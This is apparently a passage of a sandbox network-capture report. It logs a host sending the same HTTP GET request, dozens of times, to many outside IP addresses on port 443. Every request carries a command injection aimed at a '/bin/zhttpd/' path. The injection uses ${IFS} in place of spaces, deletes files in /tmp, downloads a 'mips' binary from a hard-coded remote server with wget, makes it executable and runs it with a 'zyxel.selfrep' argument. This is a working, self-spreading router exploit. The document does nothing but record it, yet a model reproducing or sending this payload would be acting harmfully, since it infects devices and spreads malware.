                              Mar 31, 2024 08:41:51.137557983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6984192.168.2.1341272176.230.94.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137598991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6985192.168.2.134449491.151.60.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137646914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6986192.168.2.1351194196.96.2.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137700081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6987192.168.2.1339136113.217.62.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137757063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6988192.168.2.134311070.89.76.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137790918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6989192.168.2.1339560177.149.129.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137831926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6990192.168.2.1353596170.192.139.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137891054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6991192.168.2.1339346184.73.100.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137923956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6992192.168.2.134739685.236.13.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.137978077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6993192.168.2.135122696.149.230.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142184973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6994192.168.2.1357866175.176.214.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142215014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6995192.168.2.133343462.49.96.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142244101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6996192.168.2.135117236.179.21.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142297029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6997192.168.2.1333456153.172.132.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142328978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6998192.168.2.135628866.93.237.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142357111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6999192.168.2.1342764197.251.235.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142389059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7000192.168.2.1335220202.78.203.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142442942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7001192.168.2.1350398119.186.156.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142498970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7002192.168.2.1346186119.200.166.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142534971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7003192.168.2.1354398174.220.13.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142584085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7004192.168.2.1351100183.138.223.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.142622948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7005192.168.2.133558639.46.178.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143251896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7006192.168.2.133603446.75.156.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143280029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7007192.168.2.1342090207.185.216.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143331051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7008192.168.2.1341994138.30.54.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143352032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7009192.168.2.1334342115.175.131.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143404961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7010192.168.2.133657088.245.38.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143429995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7011192.168.2.135482664.31.105.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143490076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7012192.168.2.134998058.215.154.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143527031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7013192.168.2.135396863.75.167.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143570900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7014192.168.2.133860075.71.250.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143621922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7015192.168.2.134040853.0.190.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143642902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7016192.168.2.1335320129.84.123.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143727064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7017192.168.2.135540443.113.238.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.143750906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7018192.168.2.1353836134.166.230.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:52.148638964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7019192.168.2.1335624217.106.177.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:52.150825977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7020192.168.2.1341280221.108.175.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:52.150888920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7021192.168.2.135349845.3.193.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:52.150981903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7022192.168.2.1349156176.157.181.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:52.151016951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7023192.168.2.1354994122.233.128.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155352116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7024192.168.2.1333882105.93.98.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155400991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7025192.168.2.133615897.136.133.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155427933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7026192.168.2.133667239.151.211.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155459881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7027192.168.2.1339754107.172.27.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155486107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7028192.168.2.1357586172.52.72.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155520916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7029192.168.2.1333236116.116.18.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155575037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7030192.168.2.1339714138.121.116.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155611992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7031192.168.2.134186423.114.160.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155638933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7032192.168.2.135280225.193.30.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155664921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7033192.168.2.135876448.20.229.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155725956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7034192.168.2.1359430184.89.174.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155760050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7035192.168.2.134439457.158.113.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155786991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7036192.168.2.1357030172.184.205.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155832052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7037192.168.2.1353526216.178.142.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155855894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7038192.168.2.134704060.91.73.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155900002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7039192.168.2.1360184114.77.39.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155932903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7040192.168.2.1334618179.74.177.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.155980110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7041192.168.2.1342726212.172.129.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156048059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7042192.168.2.135833082.250.220.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156085968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7043192.168.2.1360334156.181.187.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156097889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7044192.168.2.134262683.32.41.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156145096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7045192.168.2.1343532122.238.239.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156202078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7046192.168.2.134479886.79.46.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156244040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7047192.168.2.135856638.155.141.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156270027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7048192.168.2.1358686221.114.240.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156306028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7049192.168.2.1336570169.57.62.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156336069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7050192.168.2.135983268.144.181.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156393051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7051192.168.2.1347820126.35.238.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156443119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7052192.168.2.135870682.77.34.118443
                              TimestampBytes transferredDirectionData
